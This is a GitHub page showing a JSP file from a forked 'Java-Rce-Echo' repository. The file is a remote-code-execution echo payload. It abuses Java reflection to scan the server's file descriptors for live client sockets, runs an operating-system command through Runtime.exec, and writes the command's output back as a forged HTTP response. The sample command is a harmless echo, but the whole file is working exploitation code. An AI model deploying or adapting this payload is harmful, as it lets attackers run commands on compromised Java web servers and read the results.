forked from feihong-cs/Java-Rce-Echo
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathWindowsEcho-Deprecated.jsp
More file actions
71 lines (58 loc) · 2.65 KB
/
Copy pathWindowsEcho-Deprecated.jsp
File metadata and controls
71 lines (58 loc) · 2.65 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
//准备工作&初始化
java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
field.setAccessible(true);
Class clazz1 = Class.forName("sun.nio.ch.Net");
java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
method1.setAccessible(true);
Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
constructor2.setAccessible(true);
Class clazz3 = Class.forName("java.net.PlainSocketImpl");
java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
constructor3.setAccessible(true);
java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
write.setAccessible(true);
java.net.InetSocketAddress remoteAddress = null;
java.util.List<Integer> list1 = new java.util.ArrayList<Integer>();
java.util.List<Integer> list2 = new java.util.ArrayList<Integer>();
java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
//第一次尝试
for(int i = 0; i < 10000; i++){
field.set(fileDescriptor, i);
try{
remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
list1.add(i);
}catch(Exception e){
//pass
}
}
//延迟2s
Thread.sleep(2000);
//第二次尝试
for(int i = 0; i < 10000; i++){
field.set(fileDescriptor, i);
try{
remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
list2.add(i);
}catch(Exception e){
//pass
}
}
//取交集
list1.retainAll(list2);
for(Integer fdVal : list1){
try{
field.set(fileDescriptor, fdVal);
Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
write.invoke(socketOutputStream, new Object[]{result.getBytes()});
}catch (Exception e){
//pass
}
}
%>